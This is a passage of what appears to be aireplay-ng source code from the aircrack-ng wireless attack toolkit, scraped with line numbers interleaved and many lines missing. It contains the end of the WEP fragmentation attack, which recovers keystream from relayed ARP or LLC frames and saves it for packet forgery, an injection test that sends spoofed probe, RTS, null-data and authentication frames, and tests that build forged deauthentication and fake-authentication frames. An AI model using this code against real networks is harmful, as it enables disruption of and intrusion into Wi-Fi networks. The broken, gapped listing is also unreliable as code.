if (! memcmp(opt.r_smac, packet+4, 6)) //To our MAC
4236
if ((packet[0] & 0x08) && (( packet[1] & 0x40 ) == 0x40) ) //Is data frame && encrypted
4238
if ( (packet[1] & 2) ) //Is a FromDS packet
4240
if (! memcmp(opt.r_dmac, packet+4, 6)) //To our MAC
4242
if (! memcmp(opt.r_smac, packet+16, 6)) //From our MAC
4244
if (caplen-z < 66) //Is short enough
4246
//This is our relayed packet!
4247
PCT; printf("Got RELAYED packet!!\n");
4256
/* check if we got an deauthentication packet */
4258
if( packet[0] == 0xC0 && memcmp( packet+4, opt.r_smac, 6) == 0 )
4260
PCT; printf( "Got a deauthentication packet!\n" );
4261
read_sleep( 5*1000000 ); //sleep 5 seconds and ignore all frames in this period
4264
/* check if we got an disassociation packet */
4266
if( packet[0] == 0xA0 && memcmp( packet+4, opt.r_smac, 6) == 0 )
4268
PCT; printf( "Got a disassociation packet!\n" );
4269
read_sleep( 5*1000000 ); //sleep 5 seconds and ignore all frames in this period
4272
gettimeofday( &tv2, NULL );
4273
if (((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec)) > (100*1000) && acksgot >0 && acksgot < packets )//wait 100ms for acks
4275
PCT; printf("Not enough acks, repeating...\n");
4280
if (((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec)) > (1500*1000) && !gotit) //wait 1500ms for an answer
4282
PCT; printf("No answer, repeating...\n");
4287
PCT; printf("Still nothing, trying another packet...\n");
4295
if(again == NEW_IV) continue;
4297
make_arp_request(h80211, opt.f_bssid, opt.r_smac, opt.r_dmac, opt.r_sip, opt.r_dip, 60);
4298
if (caplen-z == 68-24)
4300
//Thats the ARP packet!
4301
// PCT; printf("Thats our ARP packet!\n");
4303
if (caplen-z == 71-24)
4305
//Thats the LLC NULL packet!
4306
// PCT; printf("Thats our LLC Null packet!\n");
4307
memset(h80211+24, '\x00', 39);
4312
//Building expected cleartext
4313
uchar ct[4096] = "\xaa\xaa\x03\x00\x00\x00\x08\x06\x00\x01\x08\x00\x06\x04\x00\x02";
4314
//Ethernet & ARP header
4316
//Followed by the senders MAC and IP:
4317
memcpy(ct+16, packet+16, 6);
4318
memcpy(ct+22, opt.r_dip, 4);
4320
//And our own MAC and IP:
4321
memcpy(ct+26, opt.r_smac, 6);
4322
memcpy(ct+32, opt.r_sip, 4);
4325
memcpy(prga, packet+z+4, 36);
4326
xor_keystream(prga, ct, 36);
4330
memcpy(prga, packet+z+4, 36);
4331
xor_keystream(prga, h80211+24, 36);
4334
memcpy(iv, packet+z, 4);
4337
while(again == RETRY)
4341
PCT; printf("Trying to get 384 bytes of a keystream\n");
4345
make_arp_request(h80211, opt.f_bssid, opt.r_smac, opt.r_dmac, opt.r_sip, opt.r_dip, arplen);
4346
if ((round % 2) == 1)
4348
PCT; printf("Trying a LLC NULL packet\n");
4349
memset(h80211+24, '\x00', arplen+8);
4354
packets=(arplen-24)/(32);
4355
if( (arplen-24)%(32) != 0 )
4358
send_fragments(h80211, arplen, iv, prga, 32, 0);
4360
// send_packet(ack, 10);
4362
gettimeofday( &tv, NULL );
4365
while (!gotit) //waiting for relayed packet
4367
caplen = read_packet(packet, sizeof(packet), NULL);
4368
z = ( ( packet[1] & 3 ) != 3 ) ? 24 : 30;
4369
if ( ( packet[0] & 0x80 ) == 0x80 ) /* QoS */
4372
if (packet[0] == 0xD4 )
4374
if (! memcmp(opt.r_smac, packet+4, 6)) //To our MAC
4379
if ((packet[0] & 0x08) && (( packet[1] & 0x40 ) == 0x40) ) //Is data frame && encrypted
4381
if ( (packet[1] & 2) ) //Is a FromDS packet with valid IV
4383
if (! memcmp(opt.r_dmac, packet+4, 6)) //To our MAC
4385
if (! memcmp(opt.r_smac, packet+16, 6)) //From our MAC
4387
if (caplen-z > 400-24 && caplen-z < 500-24) //Is short enough
4389
//This is our relayed packet!
4390
PCT; printf("Got RELAYED packet!!\n");
4399
/* check if we got an deauthentication packet */
4401
if( packet[0] == 0xC0 && memcmp( packet+4, opt.r_smac, 6) == 0 )
4403
PCT; printf( "Got a deauthentication packet!\n" );
4404
read_sleep( 5*1000000 ); //sleep 5 seconds and ignore all frames in this period
4407
/* check if we got an disassociation packet */
4409
if( packet[0] == 0xA0 && memcmp( packet+4, opt.r_smac, 6) == 0 )
4411
PCT; printf( "Got a disassociation packet!\n" );
4412
read_sleep( 5*1000000 ); //sleep 5 seconds and ignore all frames in this period
4415
gettimeofday( &tv2, NULL );
4416
if (((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec)) > (100*1000) && acksgot >0 && acksgot < packets )//wait 100ms for acks
4418
PCT; printf("Not enough acks, repeating...\n");
4423
if (((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec)) > (1500*1000) && !gotit) //wait 1500ms for an answer
4425
PCT; printf("No answer, repeating...\n");
4430
PCT; printf("Still nothing, trying another packet...\n");
4438
if(again == NEW_IV) continue;
4440
make_arp_request(h80211, opt.f_bssid, opt.r_smac, opt.r_dmac, opt.r_sip, opt.r_dip, 408);
4441
if (caplen-z == 416-24)
4443
//Thats the ARP packet!
4444
// PCT; printf("Thats our ARP packet!\n");
4446
if (caplen-z == 448-24)
4448
//Thats the LLC NULL packet!
4449
// PCT; printf("Thats our LLC Null packet!\n");
4450
memset(h80211+24, '\x00', 416);
4453
memcpy(iv, packet+z, 4);
4454
memcpy(prga, packet+z+4, 384);
4455
xor_keystream(prga, h80211+24, 384);
4459
while(again == RETRY)
4463
PCT; printf("Trying to get 1500 bytes of a keystream\n");
4465
make_arp_request(h80211, opt.f_bssid, opt.r_smac, opt.r_dmac, opt.r_sip, opt.r_dip, 1500);
4467
if ((round % 2) == 1)
4469
PCT; printf("Trying a LLC NULL packet\n");
4470
memset(h80211+24, '\x00', 1508);
4475
packets=(arplen-24)/(300);
4476
if( (arplen-24)%(300) != 0 )
4479
send_fragments(h80211, arplen, iv, prga, 300, 0);
4481
// send_packet(ack, 10);
4483
gettimeofday( &tv, NULL );
4486
while (!gotit) //waiting for relayed packet
4488
caplen = read_packet(packet, sizeof(packet), NULL);
4489
z = ( ( packet[1] & 3 ) != 3 ) ? 24 : 30;
4490
if ( ( packet[0] & 0x80 ) == 0x80 ) /* QoS */
4493
if (packet[0] == 0xD4 )
4495
if (! memcmp(opt.r_smac, packet+4, 6)) //To our MAC
4500
if ((packet[0] & 0x08) && (( packet[1] & 0x40 ) == 0x40) ) //Is data frame && encrypted
4502
if ( (packet[1] & 2) ) //Is a FromDS packet with valid IV
4504
if (! memcmp(opt.r_dmac, packet+4, 6)) //To our MAC
4506
if (! memcmp(opt.r_smac, packet+16, 6)) //From our MAC
4508
if (caplen-z > 1496-24) //Is short enough
4510
//This is our relayed packet!
4511
PCT; printf("Got RELAYED packet!!\n");
4520
/* check if we got an deauthentication packet */
4522
if( packet[0] == 0xC0 && memcmp( packet+4, opt.r_smac, 6) == 0 )
4524
PCT; printf( "Got a deauthentication packet!\n" );
4525
read_sleep( 5*1000000 ); //sleep 5 seconds and ignore all frames in this period
4528
/* check if we got an disassociation packet */
4530
if( packet[0] == 0xA0 && memcmp( packet+4, opt.r_smac, 6) == 0 )
4532
PCT; printf( "Got a disassociation packet!\n" );
4533
read_sleep( 5*1000000 ); //sleep 5 seconds and ignore all frames in this period
4536
gettimeofday( &tv2, NULL );
4537
if (((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec)) > (100*1000) && acksgot >0 && acksgot < packets )//wait 100ms for acks
4539
PCT; printf("Not enough acks, repeating...\n");
4544
if (((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec)) > (1500*1000) && !gotit) //wait 1500ms for an answer
4546
PCT; printf("No answer, repeating...\n");
4551
printf("Still nothing, quitting with 384 bytes? [y/n] \n");
4554
while(!ret) ret = scanf( "%s", tmpbuf );
4558
if( tmpbuf[0] == 'y' || tmpbuf[0] == 'Y' )
4568
if(again == NEW_IV) continue;
4570
if(again == ABORT) length = 408;
4573
make_arp_request(h80211, opt.f_bssid, opt.r_smac, opt.r_dmac, opt.r_sip, opt.r_dip, length);
4574
if (caplen == length+8+z)
4576
//Thats the ARP packet!
4577
// PCT; printf("Thats our ARP packet!\n");
4579
if (caplen == length+16+z)
4581
//Thats the LLC NULL packet!
4582
// PCT; printf("Thats our LLC Null packet!\n");
4583
memset(h80211+24, '\x00', length+8);
4588
memcpy(iv, packet+z, 4);
4589
memcpy(prga, packet+z+4, length);
4590
xor_keystream(prga, h80211+24, length);
4593
lt = localtime( (const time_t *) &tv.tv_sec );
4595
memset( strbuf, 0, sizeof( strbuf ) );
4596
snprintf( strbuf, sizeof( strbuf ) - 1,
4597
"fragment-%02d%02d-%02d%02d%02d.xor",
4598
lt->tm_mon + 1, lt->tm_mday,
4599
lt->tm_hour, lt->tm_min, lt->tm_sec );
4600
save_prga(strbuf, iv, prga, length);
4602
printf( "Saving keystream in %s\n", strbuf );
4603
printf("Now you can build a packet with packetforge-ng out of that %d bytes keystream\n", length);
4612
int grab_essid(uchar* packet, int len)
4614
int i=0, j=0, pos=0, tagtype=0, taglen=0, chan=0;
4617
memcpy(bssid, packet+16, 6);
4618
taglen = 22; //initial value to get the fixed tags parsing started
4619
taglen+= 12; //skip fixed tags in frames
4623
tagtype = packet[pos];
4624
taglen = packet[pos+1];
4625
} while(tagtype != 3 && pos < len-2);
4627
if(tagtype != 3) return -1;
4628
if(taglen != 1) return -1;
4629
if(pos+2+taglen > len) return -1;
4631
chan = packet[pos+2];
4635
taglen = 22; //initial value to get the fixed tags parsing started
4636
taglen+= 12; //skip fixed tags in frames
4640
tagtype = packet[pos];
4641
taglen = packet[pos+1];
4642
} while(tagtype != 0 && pos < len-2);
4644
if(tagtype != 0) return -1;
4645
if(taglen > 250) taglen = 250;
4646
if(pos+2+taglen > len) return -1;
4652
if( memcmp(bssid, ap[i].bssid, 6) == 0 ) //got it already
4654
if(packet[0] == 0x50 && !ap[i].found)
4658
if(ap[i].chan == 0) ap[i].chan=chan;
4664
for(j=0; j<taglen; j++)
4666
if(packet[pos+2+j] < 32 || packet[pos+2+j] > 127)
4674
memcpy(ap[i].essid, packet+pos+2, taglen);
4675
ap[i].essid[taglen] = '\0';
4676
memcpy(ap[i].bssid, bssid, 6);
4678
if(packet[0] == 0x50) ap[i].found++;
4685
static int get_ip_port(char *iface, char *ip, const int ip_size)
4690
struct in_addr addr;
4692
host = strdup(iface);
4696
ptr = strchr(host, ':');
4702
if (!inet_aton(host, (struct in_addr *)&addr))
4703
goto out; /* XXX resolve hostname */
4705
if(strlen(host) > 15)
4710
strncpy(ip, host, ip_size);
4712
if(port <= 0) port = -1;
4719
void dump_packet(unsigned char* packet, int len)
4723
for(i=0; i<len; i++)
4725
if(i>0 && i%4 == 0)printf(" ");
4726
if(i>0 && i%16 == 0)printf("\n");
4727
printf("%02X ", packet[i]);
4738
int tcp_test(const char* ip_str, const short port)
4741
struct sockaddr_in s_in;
4742
int packetsize = 1024;
4743
unsigned char packet[packetsize];
4744
struct timeval tv, tv2, tv3;
4746
int times[REQUESTS];
4747
int min, avg, max, len;
4753
s_in.sin_family = PF_INET;
4754
s_in.sin_port = htons(port);
4755
if (!inet_aton(ip_str, &s_in.sin_addr))
4758
if ((sock = socket(s_in.sin_family, SOCK_STREAM, IPPROTO_TCP)) == -1)
4761
/* avoid blocking on reading the socket */
4762
if( fcntl( sock, F_SETFL, O_NONBLOCK ) < 0 )
4764
perror( "fcntl(O_NONBLOCK) failed" );
4768
gettimeofday( &tv, NULL );
4770
while (1) //waiting for relayed packet
4772
if (connect(sock, (struct sockaddr*) &s_in, sizeof(s_in)) == -1)
4774
if(errno != EINPROGRESS && errno != EALREADY)
4779
printf("Failed to connect\n");
4786
gettimeofday( &tv2, NULL );
4790
gettimeofday( &tv2, NULL );
4791
//wait 3000ms for a successful connect
4792
if (((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec)) > (3000*1000))
4794
printf("Connection timed out\n");
4801
PCT; printf("TCP connection successful\n");
4803
//trying to identify airserv-ng
4804
memset(&nh, 0, sizeof(nh));
4805
// command: GET_CHAN
4807
nh.nh_len = htonl(0);
4809
if (send(sock, &nh, sizeof(nh), 0) != sizeof(nh))
4815
gettimeofday( &tv, NULL );
4818
while (1) //waiting for GET_CHAN answer
4820
caplen = read(sock, &nh, sizeof(nh));
4824
if( errno != EAGAIN )
4831
if( (unsigned)caplen == sizeof(nh))
4833
len = ntohl(nh.nh_len);
4834
if( nh.nh_type == 1 && i==0 )
4837
caplen = read(sock, packet, len);
4850
caplen = read(sock, packet, len);
4854
gettimeofday( &tv2, NULL );
4855
//wait 1000ms for an answer
4856
if (((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec)) > (1000*1000))
4866
PCT; printf("airserv-ng found\n");
4870
PCT; printf("airserv-ng NOT found\n");
4875
for(i=0; i<REQUESTS; i++)
4877
if ((sock = socket(s_in.sin_family, SOCK_STREAM, IPPROTO_TCP)) == -1)
4880
/* avoid blocking on reading the socket */
4881
if( fcntl( sock, F_SETFL, O_NONBLOCK ) < 0 )
4883
perror( "fcntl(O_NONBLOCK) failed" );
4889
gettimeofday( &tv, NULL );
4891
while (1) //waiting for relayed packet
4893
if (connect(sock, (struct sockaddr*) &s_in, sizeof(s_in)) == -1)
4895
if(errno != EINPROGRESS && errno != EALREADY)
4900
printf("Failed to connect\n");
4907
gettimeofday( &tv2, NULL );
4911
gettimeofday( &tv2, NULL );
4912
//wait 1000ms for a successful connect
4913
if (((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec)) > (1000*1000))
4917
//simple "high-precision" usleep
4918
select(1, NULL, NULL, NULL, &tv3);
4920
times[i] = ((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec));
4921
printf( "\r%d/%d\r", i, REQUESTS);
4930
for(i=0; i<REQUESTS; i++)
4932
if(times[i] < min) min = times[i];
4933
if(times[i] > max) max = times[i];
4938
PCT; printf("ping %s:%d (min/avg/max): %.3fms/%.3fms/%.3fms\n", ip_str, port, min/1000.0, avg/1000.0, max/1000.0);
4943
int do_attack_test()
4946
struct timeval tv, tv2, tv3;
4947
int len=0, i=0, j=0, k=0;
4948
int gotit=0, answers=0, found=0;
4949
int caplen=0, essidlen=0;
4950
unsigned int min, avg, max;
4954
int atime=200; //time in ms to wait for answer packet (needs to be higher for airserv)
4955
unsigned char nulldata[1024];
4957
if(opt.port_out > 0)
4960
PCT; printf("Testing connection to injection device %s\n", opt.iface_out);
4961
ret = tcp_test(opt.ip_out, opt.port_out);
4968
/* open the replay interface */
4969
_wi_out = wi_open(opt.iface_out);
4973
dev.fd_out = wi_fd(_wi_out);
4974
wi_get_mac(_wi_out, dev.mac_out);
4975
if(opt.s_face == NULL)
4978
dev.fd_in = dev.fd_out;
4981
dev.arptype_in = dev.arptype_out;
4982
wi_get_mac(_wi_in, dev.mac_in);
4986
if(opt.s_face && opt.port_in > 0)
4989
PCT; printf("Testing connection to capture device %s\n", opt.s_face);
4990
ret = tcp_test(opt.ip_in, opt.port_in);
4997
/* open the packet source */
4998
_wi_in = wi_open(opt.s_face);
5001
dev.fd_in = wi_fd(_wi_in);
5002
wi_get_mac(_wi_in, dev.mac_in);
5005
else if(opt.s_face && opt.port_in <= 0)
5007
_wi_in = wi_open(opt.s_face);
5010
dev.fd_in = wi_fd(_wi_in);
5011
wi_get_mac(_wi_in, dev.mac_in);
5015
if(opt.port_in <= 0)
5017
/* avoid blocking on reading the socket */
5018
if( fcntl( dev.fd_in, F_SETFL, O_NONBLOCK ) < 0 )
5020
perror( "fcntl(O_NONBLOCK) failed" );
5025
if(getnet(NULL, 0, 0) != 0)
5028
srand( time( NULL ) );
5030
memset(ap, '\0', 20*sizeof(struct APt));
5032
essidlen = strlen(opt.r_essid);
5033
if( essidlen > 250) essidlen = 250;
5039
ap[0].len = essidlen;
5040
memcpy(ap[0].essid, opt.r_essid, essidlen);
5041
ap[0].essid[essidlen] = '\0';
5042
memcpy(ap[0].bssid, opt.r_bssid, 6);
5047
set_bitrate(_wi_out, RATE_1M);
5049
PCT; printf("Trying broadcast probe requests...\n");
5051
memcpy(h80211, PROBE_REQ, 24);
5055
h80211[24] = 0x00; //ESSID Tag Number
5056
h80211[25] = 0x00; //ESSID Tag Length
5060
memcpy(h80211+len, RATES, 16);
5069
random source so we can identify our packets
5071
opt.r_smac[0] = 0x00;
5072
opt.r_smac[1] = rand() & 0xFF;
5073
opt.r_smac[2] = rand() & 0xFF;
5074
opt.r_smac[3] = rand() & 0xFF;
5075
opt.r_smac[4] = rand() & 0xFF;
5076
opt.r_smac[5] = rand() & 0xFF;
5078
memcpy(h80211+10, opt.r_smac, 6);
5080
send_packet(h80211, len);
5082
gettimeofday( &tv, NULL );
5084
while (1) //waiting for relayed packet
5086
caplen = read_packet(packet, sizeof(packet), &ri);
5088
if (packet[0] == 0x50 ) //Is probe response
5090
if (! memcmp(opt.r_smac, packet+4, 6)) //To our MAC
5092
if(grab_essid(packet, caplen) == 0 && (!memcmp(opt.r_bssid, NULL_MAC, 6)))
5098
PCT; printf("Injection is working!\n");
5099
if(opt.fast) return 0;
5106
if (packet[0] == 0x80 ) //Is beacon frame
5108
if(grab_essid(packet, caplen) == 0 && (!memcmp(opt.r_bssid, NULL_MAC, 6)))
5114
gettimeofday( &tv2, NULL );
5115
if (((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec)) > (3*atime*1000)) //wait 'atime'ms for an answer
5123
PCT; printf("No Answer...\n");
5126
PCT; printf("Found %d AP%c\n", found, ((found == 1) ? ' ' : 's' ) );
5131
PCT; printf("Trying directed probe requests...\n");
5134
for(i=0; i<found; i++)
5136
if(wi_get_channel(_wi_out) != ap[i].chan)
5138
wi_set_channel(_wi_out, ap[i].chan);
5141
if(wi_get_channel(_wi_in) != ap[i].chan)
5143
wi_set_channel(_wi_in, ap[i].chan);
5146
PCT; printf("%02X:%02X:%02X:%02X:%02X:%02X - channel: %d - \'%s\'\n", ap[i].bssid[0], ap[i].bssid[1],
5147
ap[i].bssid[2], ap[i].bssid[3], ap[i].bssid[4], ap[i].bssid[5], ap[i].chan, ap[i].essid);
5155
memcpy(h80211, PROBE_REQ, 24);
5159
h80211[24] = 0x00; //ESSID Tag Number
5160
h80211[25] = ap[i].len; //ESSID Tag Length
5161
memcpy(h80211+len+2, ap[i].essid, ap[i].len);
5165
memcpy(h80211+len, RATES, 16);
5169
for(j=0; j<REQUESTS; j++)
5172
random source so we can identify our packets
5174
opt.r_smac[0] = 0x00;
5175
opt.r_smac[1] = rand() & 0xFF;
5176
opt.r_smac[2] = rand() & 0xFF;
5177
opt.r_smac[3] = rand() & 0xFF;
5178
opt.r_smac[4] = rand() & 0xFF;
5179
opt.r_smac[5] = rand() & 0xFF;
5181
//build/send probe request
5182
memcpy(h80211+10, opt.r_smac, 6);
5184
send_packet(h80211, len);
5187
//build/send request-to-send
5188
memcpy(nulldata, RTS, 16);
5189
memcpy(nulldata+4, ap[i].bssid, 6);
5190
memcpy(nulldata+10, opt.r_smac, 6);
5192
send_packet(nulldata, 16);
5195
//build/send null data packet
5196
memcpy(nulldata, NULL_DATA, 24);
5197
memcpy(nulldata+4, ap[i].bssid, 6);
5198
memcpy(nulldata+10, opt.r_smac, 6);
5199
memcpy(nulldata+16, ap[i].bssid, 6);
5201
send_packet(nulldata, 24);
5204
//build/send auth request packet
5205
memcpy(nulldata, AUTH_REQ, 30);
5206
memcpy(nulldata+4, ap[i].bssid, 6);
5207
memcpy(nulldata+10, opt.r_smac, 6);
5208
memcpy(nulldata+16, ap[i].bssid, 6);
5210
send_packet(nulldata, 30);
5213
gettimeofday( &tv, NULL );
5215
printf( "\r%2d/%2d: %3d%%\r", ap[i].found, j+1, ((ap[i].found*100)/(j+1)));
5217
while (1) //waiting for relayed packet
5219
caplen = read_packet(packet, sizeof(packet), &ri);
5221
if (packet[0] == 0x50 ) //Is probe response
5223
if (! memcmp(opt.r_smac, packet+4, 6)) //To our MAC
5225
if(! memcmp(ap[i].bssid, packet+16, 6)) //From the mentioned AP
5227
gettimeofday( &tv3, NULL);
5228
ap[i].ping[j] = ((tv3.tv_sec*1000000 - tv.tv_sec*1000000) + (tv3.tv_usec - tv.tv_usec));
5233
PCT; printf("Injection is working!\n\n");
5239
if((signed)ri.ri_power > -200)
5240
ap[i].pwr[j] = (signed)ri.ri_power;
5246
if (packet[0] == 0xC4 ) //Is clear-to-send
5248
if (! memcmp(opt.r_smac, packet+4, 6)) //To our MAC
5250
gettimeofday( &tv3, NULL);
5251
ap[i].ping[j] = ((tv3.tv_sec*1000000 - tv.tv_sec*1000000) + (tv3.tv_usec - tv.tv_usec));
5256
PCT; printf("Injection is working!\n\n");
5262
if((signed)ri.ri_power > -200)
5263
ap[i].pwr[j] = (signed)ri.ri_power;
5268
if (packet[0] == 0xD4 ) //Is ack
5270
if (! memcmp(opt.r_smac, packet+4, 6)) //To our MAC
5272
gettimeofday( &tv3, NULL);
5273
ap[i].ping[j] = ((tv3.tv_sec*1000000 - tv.tv_sec*1000000) + (tv3.tv_usec - tv.tv_usec));
5278
PCT; printf("Injection is working!\n\n");
5284
if((signed)ri.ri_power > -200)
5285
ap[i].pwr[j] = (signed)ri.ri_power;
5290
if (packet[0] == 0xB0 ) //Is auth response
5292
if (! memcmp(opt.r_smac, packet+4, 6)) //To our MAC
5294
if (! memcmp(packet+10, packet+16, 6)) //From BSS ID
5296
gettimeofday( &tv3, NULL);
5297
ap[i].ping[j] = ((tv3.tv_sec*1000000 - tv.tv_sec*1000000) + (tv3.tv_usec - tv.tv_usec));
5302
PCT; printf("Injection is working!\n\n");
5308
if((signed)ri.ri_power > -200)
5309
ap[i].pwr[j] = (signed)ri.ri_power;
5315
gettimeofday( &tv2, NULL );
5316
if (((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec)) > (atime*1000)) //wait 'atime'ms for an answer
5322
printf( "\r%2d/%2d: %3d%%\r", ap[i].found, j+1, ((ap[i].found*100)/(j+1)));
5325
for(j=0; j<REQUESTS; j++)
5327
if(ap[i].ping[j] > 0)
5329
if(ap[i].ping[j] > max) max = ap[i].ping[j];
5330
if(ap[i].ping[j] < min) min = ap[i].ping[j];
5331
avg += ap[i].ping[j];
5332
avg2 += ap[i].pwr[j];
5338
avg2 /= ap[i].found;
5339
PCT; printf("Ping (min/avg/max): %.3fms/%.3fms/%.3fms Power: %.2f\n", (min/1000.0), (avg/1000.0), (max/1000.0), avg2);
5341
PCT; printf("%2d/%2d: %3d%%\n\n", ap[i].found, REQUESTS, ((ap[i].found*100)/REQUESTS));
5343
if(!gotit && answers)
5345
PCT; printf("Injection is working!\n\n");
5354
PCT; printf("Trying directed probe requests for all bitrates...\n");
5357
for(i=0; i<found; i++)
5359
if(ap[i].found <= 0)
5362
PCT; printf("%02X:%02X:%02X:%02X:%02X:%02X - channel: %d - \'%s\'\n", ap[i].bssid[0], ap[i].bssid[1],
5363
ap[i].bssid[2], ap[i].bssid[3], ap[i].bssid[4], ap[i].bssid[5], ap[i].chan, ap[i].essid);
5369
memcpy(h80211, PROBE_REQ, 24);
5373
h80211[24] = 0x00; //ESSID Tag Number
5374
h80211[25] = ap[i].len; //ESSID Tag Length
5375
memcpy(h80211+len+2, ap[i].essid, ap[i].len);
5379
memcpy(h80211+len, RATES, 16);
5383
for(k=0; k<RATE_NUM; k++)
5386
if(set_bitrate(_wi_out, bitrates[k]))
5391
memset(ap[i].pwr, 0, REQUESTS*sizeof(unsigned int));
5393
for(j=0; j<REQUESTS; j++)
5396
random source so we can identify our packets
5398
opt.r_smac[0] = 0x00;
5399
opt.r_smac[1] = rand() & 0xFF;
5400
opt.r_smac[2] = rand() & 0xFF;
5401
opt.r_smac[3] = rand() & 0xFF;
5402
opt.r_smac[4] = rand() & 0xFF;
5403
opt.r_smac[5] = rand() & 0xFF;
5405
memcpy(h80211+10, opt.r_smac, 6);
5407
send_packet(h80211, len);
5409
gettimeofday( &tv, NULL );
5411
printf( "\r%2d/%2d: %3d%%\r", ap[i].found, j+1, ((ap[i].found*100)/(j+1)));
5413
while (1) //waiting for relayed packet
5415
caplen = read_packet(packet, sizeof(packet), &ri);
5417
if (packet[0] == 0x50 ) //Is probe response
5419
if (! memcmp(opt.r_smac, packet+4, 6)) //To our MAC
5421
if(! memcmp(ap[i].bssid, packet+16, 6)) //From the mentioned AP
5428
if((signed)ri.ri_power > -200)
5429
ap[i].pwr[j] = (signed)ri.ri_power;
5435
gettimeofday( &tv2, NULL );
5436
if (((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec)) > (100*1000)) //wait 300ms for an answer
5442
printf( "\r%2d/%2d: %3d%%\r", ap[i].found, j+1, ((ap[i].found*100)/(j+1)));
5445
for(j=0; j<REQUESTS; j++)
5446
avg2 += ap[i].pwr[j];
5448
avg2 /= ap[i].found;
5449
PCT; printf("Probing at %2.1f Mbps:\t%2d/%2d: %3d%%\n", wi_get_rate(_wi_out)/1000000.0,
5450
ap[i].found, REQUESTS, ((ap[i].found*100)/REQUESTS));
5453
if(!gotit && answers)
5455
PCT; printf("Injection is working!\n\n");
5456
if(opt.fast) return 0;
5462
set_bitrate(_wi_out, RATE_1M);
5464
if( opt.s_face != NULL )
5467
PCT; printf("Trying card-to-card injection...\n");
5469
/* sync both cards to the same channel, or the test will fail */
5470
if(wi_get_channel(_wi_out) != wi_get_channel(_wi_in))
5472
wi_set_channel(_wi_out, wi_get_channel(_wi_in));
5480
opt.f_smac[0] = 0x00;
5481
opt.f_smac[1] = rand() & 0xFF;
5482
opt.f_smac[2] = rand() & 0xFF;
5483
opt.f_smac[3] = rand() & 0xFF;
5484
opt.f_smac[4] = rand() & 0xFF;
5485
opt.f_smac[5] = rand() & 0xFF;
5487
opt.f_dmac[0] = 0x00;
5488
opt.f_dmac[1] = rand() & 0xFF;
5489
opt.f_dmac[2] = rand() & 0xFF;
5490
opt.f_dmac[3] = rand() & 0xFF;
5491
opt.f_dmac[4] = rand() & 0xFF;
5492
opt.f_dmac[5] = rand() & 0xFF;
5494
opt.f_bssid[0] = 0x00;
5495
opt.f_bssid[1] = rand() & 0xFF;
5496
opt.f_bssid[2] = rand() & 0xFF;
5497
opt.f_bssid[3] = rand() & 0xFF;
5498
opt.f_bssid[4] = rand() & 0xFF;
5499
opt.f_bssid[5] = rand() & 0xFF;
5501
if(i==0) //attack -0
5503
memcpy( h80211, DEAUTH_REQ, 26 );
5504
memcpy( h80211 + 16, opt.f_bssid, 6 );
5505
memcpy( h80211 + 4, opt.f_dmac, 6 );
5506
memcpy( h80211 + 10, opt.f_smac, 6 );
5509
opt.f_tods = 0; opt.f_fromds = 0;
5510
opt.f_minlen = opt.f_maxlen = 26;
5512
else if(i==1) //attack -1 (open)
5514
memcpy( h80211, AUTH_REQ, 30 );
5515
memcpy( h80211 + 4, opt.f_dmac, 6 );
5516
memcpy( h80211 + 10, opt.f_smac , 6 );
5517
memcpy( h80211 + 16, opt.f_bssid, 6 );
5520
opt.f_tods = 0; opt.f_fromds = 0;
5521
opt.f_minlen = opt.f_maxlen = 30;
5523
else if(i==2) //attack -1 (psk)
5525
memcpy( h80211, ska_auth3, 24);
5526
memcpy( h80211 + 4, opt.f_dmac, 6);
5527
memcpy( h80211 + 10, opt.f_smac, 6);
5528
memcpy( h80211 + 16, opt.f_bssid, 6);
5536
//random bytes (as encrypted data)
5537
for(j=0; j<132; j++)
5538
h80211[28+j] = rand() & 0xFF;
5541
opt.f_tods = 0; opt.f_fromds = 0;
5542
opt.f_minlen = opt.f_maxlen = 24+4+132;
5544
else if(i==3) //attack -3
5546
memcpy( h80211, NULL_DATA, 24);
5547
memcpy( h80211 + 4, opt.f_bssid, 6);
5548
memcpy( h80211 + 10, opt.f_smac, 6);
5549
memcpy( h80211 + 16, opt.f_dmac, 6);
5557
//random bytes (as encrypted data)
5558
for(j=0; j<132; j++)
5559
h80211[28+j] = rand() & 0xFF;
5562
opt.f_tods = 1; opt.f_fromds = 0;
5563
opt.f_minlen = opt.f_maxlen = 24+4+132;
5565
else if(i==4) //attack -5
5567
memcpy( h80211, NULL_DATA, 24);
5568
memcpy( h80211 + 4, opt.f_bssid, 6);
5569
memcpy( h80211 + 10, opt.f_smac, 6);
5570
memcpy( h80211 + 16, opt.f_dmac, 6);
5582
//random bytes (as encrypted data)
5584
h80211[28+j] = rand() & 0xFF;
5587
opt.f_tods = 1; opt.f_fromds = 0;
5588
opt.f_minlen = opt.f_maxlen = 24+4+7;
5591
for(j=0; (j<(REQUESTS/4) && !k); j++) //try it 5 times
5593
send_packet( h80211, opt.f_minlen );
5595
gettimeofday( &tv, NULL );
5596
while (1) //waiting for relayed packet
5598
caplen = read_packet(packet, sizeof(packet), &ri);
5599
if ( filter_packet(packet, caplen) == 0 ) //got same length and same type
5606
if(i == 0) //attack -0
5608
if( h80211[0] == packet[0] )
5614
else if(i==1) //attack -1 (open)
5616
if( h80211[0] == packet[0] )
5622
else if(i==2) //attack -1 (psk)
5624
if( h80211[0] == packet[0] && memcmp(h80211+24, packet+24, caplen-24) == 0 )
5630
else if(i==3) //attack -2/-3/-4/-6
5632
if( h80211[0] == packet[0] && memcmp(h80211+24, packet+24, caplen-24) == 0 )
5638
else if(i==4) //attack -5/-7
5640
